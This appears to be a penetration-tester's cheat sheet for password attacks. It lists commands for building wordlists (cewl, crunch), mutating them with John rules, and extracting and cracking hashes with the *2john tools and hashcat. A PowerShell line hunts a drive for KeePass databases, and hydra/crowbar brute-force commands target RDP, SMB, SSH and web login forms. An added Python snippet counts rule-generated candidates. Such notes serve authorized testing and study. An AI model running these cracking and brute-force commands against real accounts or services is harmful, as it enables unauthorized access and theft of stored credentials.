-
Generating a wordlist from the words found on a website
cewl <domain> -w wordlist.txt
-
Character translation (placeholders for crunch -t patterns)
@ = Lower case alpha characters
, = Upper case alpha characters
% = Numeric characters
^ = Special characters including space
-
Usage
./crunch <min-len> <max-len> [charset]
-
basic examples
crunch 9 9 -t ,@@@@^%%%
crunch 4 6 0123456789abcdef -o wordlist.txt
-
Add the rules you want to /etc/john/john.conf inside the [List.Rules:Wordlist] section to mutate your wordlists
-> basic rule example: $@$[1-2]$[0-9]$[0-9]$[0-9] (appends @ followed by a four-digit number from 1000 to 2999)
john --wordlist=wordlist.txt --rules --stdout > mutated.txt
https://www.openwall.com/john/doc/RULES.shtml
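Added example (not part of the original notes, and not John's own code): a small Python expander for the `$` (append) and `^` (prepend) rule commands with `[...]` preprocessor classes, so you can see how many candidates a single rule such as the one above adds per base word; handy when estimating how much a "symbol plus digits" password policy really buys against rule-based guessing. The sample words are constructed.

```python
import itertools
from typing import List, Tuple

def _parse_class(spec: str) -> List[str]:
    """Expand the inside of a [...] class, e.g. "1-2" -> ["1", "2"], "ab" -> ["a", "b"]."""
    chars: List[str] = []
    i = 0
    while i < len(spec):
        if i + 2 < len(spec) and spec[i + 1] == "-":      # a range like 0-9
            chars.extend(chr(c) for c in range(ord(spec[i]), ord(spec[i + 2]) + 1))
            i += 3
        else:                                              # a literal character
            chars.append(spec[i])
            i += 1
    return chars

def expand_rule(rule: str) -> List[List[Tuple[str, str]]]:
    """Turn one rule line into the concrete rules John's preprocessor would emit.
    Supports only $X / ^X with optional [..] classes; each concrete rule is a
    list of (command, char) pairs."""
    commands: List[Tuple[str, List[str]]] = []
    i = 0
    while i < len(rule):
        cmd = rule[i]
        if cmd not in "$^":
            raise ValueError(f"unsupported command {cmd!r}")
        i += 1
        if rule[i] == "[":
            end = rule.index("]", i)
            choices = _parse_class(rule[i + 1:end])
            i = end + 1
        else:
            choices = [rule[i]]
            i += 1
        commands.append((cmd, choices))
    cmds = [c for c, _ in commands]
    return [list(zip(cmds, combo))
            for combo in itertools.product(*[ch for _, ch in commands])]

def apply_rule(word: str, concrete: List[Tuple[str, str]]) -> str:
    """Apply one concrete rule: $ appends, ^ prepends (later ^ goes in front)."""
    out = word
    for cmd, ch in concrete:
        out = out + ch if cmd == "$" else ch + out
    return out

def mangle(word: str, rule: str) -> List[str]:
    """All candidates a rule line produces for one base word."""
    return [apply_rule(word, c) for c in expand_rule(rule)]

if __name__ == "__main__":
    cands = mangle("summer", "$@$[1-2]$[0-9]$[0-9]$[0-9]")   # constructed base word
    print(len(cands), cands[0], cands[-1])                     # 2000 summer@1000 summer@2999
```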
-
Identifying the hash type
hashid <hash>
https://www.tunnelsup.com/hash-analyzer/
https://hashes.com/en/tools/hash_identifier
-
Extracting crackable hashes from files with the *2john helpers
- ssh2john
- rar2john
- zip2john
- keepass2john
- office2john
- pdf2john
- pwsafe2john
- racf2john
- vncpcap2john
- hccap2john
- keychain2john
- mozilla2john
-
Search KeePass database files
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
-
Hashing the .kdbx file
keepass2john Database.kdbx > keepass.hash
-
Finding Hash-Mode ID of hashcat
hashcat --help | grep -i "KeePass"
-
Cracking
hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt
-
Online password attacks against network services
hydra -L /usr/share/wordlists/rockyou.txt -p "<password>" rdp://<IP>
crowbar -b rdp -s X.X.X.X/32 -u admin -C /usr/share/wordlists/rockyou.txt -n 1
hydra -L /root/Desktop/user.txt -P /usr/share/wordlists/rockyou.txt <IP> smb
hydra -l <user> -P /usr/share/wordlists/rockyou.txt ssh://<IP>
hydra -l <user> -P /usr/share/wordlists/rockyou.txt <IP> http-post-form "/login.php:user=admin&pass=^PASS^:Invalid Login" -vV -f
hydra -l <username> -P /usr/share/wordlists/rockyou.txt -f <IP> http-get /login